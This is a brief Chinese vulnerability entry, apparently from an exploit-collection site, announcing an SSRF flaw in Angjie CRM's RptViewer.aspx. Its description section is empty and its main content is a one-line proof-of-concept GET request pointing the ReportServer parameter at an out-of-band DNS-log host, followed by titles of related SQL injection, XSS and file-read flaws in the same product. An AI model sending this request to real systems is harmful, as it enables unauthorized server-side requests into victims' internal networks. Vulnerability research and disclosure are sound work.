昂捷CRM RptViewer.aspx存在SSRF漏洞

漏洞描述

PoC代码

GET /WebForms/RptViewer.aspx?ReportServer=http://{{dnslog}}

相关漏洞推荐

• 昂捷-CRM-CWSOffice.asmx SQL注入
• 昂捷CRM RptHelperSave接口存在XSS漏洞
• POC angjie-crm-rptviewer-ssrf: 昂捷CRM-RptViewer.aspx存在SSRF漏洞
• 昂捷CRM cwsuploadpicture.asmx 文件读取漏洞